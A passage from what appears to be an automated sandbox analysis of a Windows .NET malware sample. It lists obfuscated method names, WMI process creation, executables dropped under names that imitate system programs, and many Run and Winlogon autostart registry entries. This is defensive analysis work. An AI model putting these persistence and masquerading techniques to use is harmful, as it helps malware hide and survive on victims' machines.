                              Source: s5duotgoYD.exe, TJDGv4o3tGMWVkWb0U5.csHigh entropy of concatenated method names: 'x1soROK8HG', 'GpYozstcgY', 't47odabPUQ', 'fVRo0ZtiFU', 'OOYowswKUs', 'Khmo2a58yG', 'APEoSYBur0', 'sLUoLoFbw5', 'EOXoDqCS8B', 'Y8FobILLsI'
                              Source: s5duotgoYD.exe, MBhJSUu6jHotHTuvZB8.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'wWKu2WPNiNUBoQqmaD95', 'RP8ERTPNgks22UL81wKq', 'JqYjt4PN3sATUsNTGBIL'
                              Source: s5duotgoYD.exe, E2qABAV9CNP0GAOVf1W.csHigh entropy of concatenated method names: 'xLcVKCmsSV', 'DZFV6FoK11', 'yDnVu6p9Qn', 'rfGVB3Ew8M', 'A3IV4cd8wP', 'cTjVvISpwC', 'WwKVgLNSlT', 'upgV3vlKW3', 'kCiVigEEoT', 'OIcVdMR1xu'
                              Source: s5duotgoYD.exe, bnaub24hRYolQNX5RbX.csHigh entropy of concatenated method names: 'ymD4yu4Z7Z', 'Yjq4K285nB', 'sE846L9KoZ', 'QQZ4uIohN6', 'gqP4BxgETW', 'fkE44e19oJ', 'sBA4vIYvOV', 'gn94gWsKQN', 'ALS43ABblQ', 'QLO4i4M2gy'
                              Source: s5duotgoYD.exe, beS8hkEHVLQCkMXEfAt.csHigh entropy of concatenated method names: 'AgPL1wPBhFZqnevI2pPB', 'X8RWFDPB9L4WVidWypjh', 'BcaSLdPByfjjgtIiNATj', 'aQ3MpZVASh', 'ugaBysPBB7nmfprru35e', 'y7ugs8PB63TrV8ubJ8OK', 'TSWDTVPBufKrddY0A5sA', 'XsTFKQPB4ZGFEYHDq3Zj', 'N7LOPTa4E8', 'w63DxfPBinoaTBlgmNxO'
                              Source: s5duotgoYD.exe, vDL3fqTpkCku0ZqDFb7.csHigh entropy of concatenated method names: 'YoChId7gdM', 'YxXhP70jao', 'Yd7', 'EKph1Kc0so', 'HOxhtYDFua', 'BfAhX5ucQN', 'FJeh71g3kK', 'slx5O1PDnIaFvyy2Qib8', 'IDUcRBPDXcMLcyw1mOsC', 'UoZIRBPD7txsEJXdZMsh'
                              Source: s5duotgoYD.exe, ye1U3ItD2BKRGaAsCux.csHigh entropy of concatenated method names: 'rbfXth9r9g', 'hPyXXRhhSk', 'hqMX7vkyEX', 's5y0cFPTmcb1kMNGDAvg', 'PmqiTdPTEYPxJLm6LgSY', 'me49eoPTn0dEC71X08wq', 'ACYHmCPTJArEvIvEbgCA', 'hPjXqeMIYp', 'ltTtCgPTU1m6xG0CVZ8s', 'gGSlhhPTq9CNGrveKknd'
                              Source: s5duotgoYD.exe, h8oQHnh5IZ7Vlqdaabd.csHigh entropy of concatenated method names: 'OT3hpuJ4u6', 'zhFhzshoBv', 'SpI9IVHAcs', 'hpc9PD7V4G', 'glQ91FBuCZ', 'pKJ9ttOKYw', 'Rpx', 'method_4', 'f6W', 'uL1'
                              Source: s5duotgoYD.exe, WJGCbjOqJIP7jZRoA52.csHigh entropy of concatenated method names: 'Dispose', 'pD1OUJKsAQ', 'ig5OMl20Up', 'hvCOOHIIsK', 'H0TlDNPBc9B0Npj1pljk', 'q7n21OPBGGxgAMRViAUa', 'mEw29FPB56yVfwqhqdef', 'AUfYHLPBRTOWr1I3ScFD', 'Cb2LouPBpvtUX2qFsSP1'
                              Source: s5duotgoYD.exe, dixVpNXvQ9lmQrh9qQp.csHigh entropy of concatenated method names: 'gRhXRkKjFN', 'K87HRNPhkhFD6njpQKy7', 'rJcKq5PhquQhcJ03rtW7', 'cUT38GPhm4teZ2O5Txkc', 'EhBScHPhEH0n6hathJV7', 'D04RC3PhO4F5TpRVp5JQ', 'pjY8kUPhUyv02ABDSrUt', 'eFruYNPhMQwOJfWCkxDu', 'ebU1JoPhsVavvO21VDrQ', 'CIn7nB0YrM'
                              Source: s5duotgoYD.exe, cnL1yQOQT9aahVWNijS.csHigh entropy of concatenated method names: 'KFQ8UIuueu', 'XeB8M4bNxg', 'SJBWYIPvLnpxavLefvmq', 'fEkhPcPv2eZf44MAIIva', 'BIMYlCPvSvsvN5CmXkd0', 'Ujj3CPPvDxgqVF3sOqtL', 'biJrfFPvbp0pM4folQ4U', 'OOQ882IedU', 'IBAQKrPvciQxHfLXjYR6', 'HVFJ2nPvxc1LCgP2Oelf'
                              Source: s5duotgoYD.exe, oSeq7Irseptef23go3r.csHigh entropy of concatenated method names: 'le10RYPiHy4GPS9gA6FW', 'gNJ39cPiaPkrlrPES0xR', 'ikLGqiPif2Gl5Mxo8FsK', 'wneyf9PiFe8vaNm5FfIv', 'BmrxSRPiQ6Fuq9BFLVY9', 'method_0', 'method_1', 'XSdrW6YxNS', 'fJKrCAgMc2', 'pU9r8URBdy'
                              Source: s5duotgoYD.exe, ylMbD5ZhM1WfMXLeW5V.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                              Source: s5duotgoYD.exe, DvIUGp84x0D3oU4ovRt.csHigh entropy of concatenated method names: 'ODb8wZwOsX', 'K5x822poTG', 'mXf8SuTAyK', 'GS9fSmPgCtqZXKCoSgH9', 'Tf6L4bPgjDOuZLAordCI', 'D7XImJPgWRKNHvMgL9XN', 'u5fbAXPg8vyisGbXGOlq', 'YPi8g6X0Uf', 'ktL83B7Q4N', 'cN48iaNpLv'
                              Source: s5duotgoYD.exe, SMKtaQT0RGSsKvVMofy.csHigh entropy of concatenated method names: 'sXqT2hkXvx', 'xH0TSZtIdF', 'qwlTLRMjRp', 'pmCTD93GIT', 'qHJTbC2TMm', 'NHI0xbPLVEnqoXNdlqks', 'BJER1RPLcmoemHnW35wH', 'evg5vQPLGhtCKKO8fbFj', 'tIHufmPLNr4XbJqfieOc', 'T5wXg1PLxeKnJNGNdXVZ'
                              Source: s5duotgoYD.exe, NyMSvavGV23LxIOirj2.csHigh entropy of concatenated method names: 'mSevR7En9s', 'BPDvpMCGMB', 'U8Yvzgl69b', 'Y8qgIJTb5m', 'MdkgPSVH98', 'YgNg1VhICC', 'fgrgttDHx4', 'EYpgXhqMk9', 'cl0g73mQS2', 'cmkgnASUjj'
                              Source: s5duotgoYD.exe, gSqcHpzUhQLHxvAJxq.csHigh entropy of concatenated method names: 'iBCPPgJ8wg', 'IBBPtdZJfv', 'cWQPXBIrC4', 'TkKP7HlImx', 'aeqPnpCe65', 'E8YPJ5V1fi', 'rfEPECWtyW', 'b71kPPPo7OUN0MP66fX3', 'tnc2uXPon0c9GQZ1QMFw', 'PNvJJNPoJfCVTGH9Qmf5'
                              Source: s5duotgoYD.exe, QsIsY67EjBu9NKmlaL1.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'Sm5Pm7FVbrp', 'xV8PXPa3M1k', 'eL68V3PhQGnVLG52U2Nw', 'bf4450PhHV9sfpDR3UMn', 'vWYg6JPhaHmQtjveGRsO', 'sIP1uaPhfKc466iQp8yb'
                              Source: s5duotgoYD.exe, YWMZGrchZ5HZEvwE2QD.csHigh entropy of concatenated method names: 'n3hcyR5A2U', 'xILcKljYey', 'RwWc6FKysV', 'X1lcuPNYlO', 'Dispose', 'xeUCGvP5AG0Kbnr1yW49', 'RuDDFEP5eqWaYP2x7oCq', 'N1M7y5P5oBGLHy0wX1He', 'i6UZGcP5ZAyAipqL0ktN', 'mMFRNrP5TaubiIcbquKA'
                              Source: s5duotgoYD.exe, uJC0vBn3AnijQIqjJTv.csHigh entropy of concatenated method names: 'HVnncK9JKZ', 'JbtnGFUuKH', 'Ahcn5HFU69', 'N16i7EPyECRRbvgIBdH8', 'cKWpkNPykfTlgHoybTH5', 'geXGysPyJAkMf7gIJ9PJ', 'zYhTaiPym7apfIIFMetj', 'TE4ndG0dkl', 'Eygn03sPSd', 'LMinwiadnX'
                              Source: s5duotgoYD.exe, cOGb1OnaFlVlw3DPy38.csHigh entropy of concatenated method names: 'SxdnhPiQhG', 'bkf6juP90r5ExoMbUgDf', 'gOMIBVP9ibAIYuAyCHBc', 'qFpNHGP9dTDMvUEMMSMC', 'jAfNdJP9wkU0P5Os9Il9', 'E94', 'P9X', 'vmethod_0', 'vUPPXYNJkD0', 'AxXPmEK7gFv'
                              Source: s5duotgoYD.exe, mk9meEANsiBsvliHytu.csHigh entropy of concatenated method names: 'UsCAVWxRaZ', 'LFLAcISLQD', 'vjLAGS10tN', 'iV5A5ahynF', 'gKJARhMZos', 'NUSX1WP2VL67P5wCuOdf', 'btTw1dP2NXlmOCbUgS6o', 'oU36hLP2xcU9F30UgLtq', 'UWXRNSP2cGVjxHtxraXa', 'JFFLLIP2GOeFSs8e3n8y'
                              Source: s5duotgoYD.exe, Nj3WXnKB9OSF4L2hqUv.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'wfkKvxb3wQ', 'BXOKgbEXWm', 'NNPK3ljKmj', 'GRZKiD0IQD', 'iDYKdMvHPU', 'sngK0I0yW4', 'usEsPNPbcN5TZCnwj4SF'

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeExecutable created and started: C:\Windows\ModemLogs\conhost.exe
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\kZSUvzow.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\vNwKfKje.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\vlWcZFKy.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\SlQgWXuB.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\vEZKvYQi.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\pkWDNnmN.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\WgRxdDkv.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\ModemLogs\conhost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\mjoVvRUx.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Recovery\xKVBpkhCEjg.exeJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\CjKcCUFn.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\UAuXMqPf.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\twain_32\xKVBpkhCEjg.exeJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\cZuWGjpj.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\XIsgiJJb.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\ModemLogs\conhost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\twain_32\xKVBpkhCEjg.exeJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\vEZKvYQi.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\UAuXMqPf.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\XIsgiJJb.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\vNwKfKje.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\mjoVvRUx.logJump to dropped file
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\kZSUvzow.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\pkWDNnmN.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\WgRxdDkv.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\vlWcZFKy.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\cZuWGjpj.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\SlQgWXuB.logJump to dropped file
                              Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\CjKcCUFn.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an autostart registry key pointing to binary in C:\Windows
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjgJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run s5duotgoYDJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjgJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjgJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjgJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjgJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run s5duotgoYDJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run s5duotgoYDJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run s5duotgoYDJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run s5duotgoYDJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjgJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjgJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjgJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjgJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
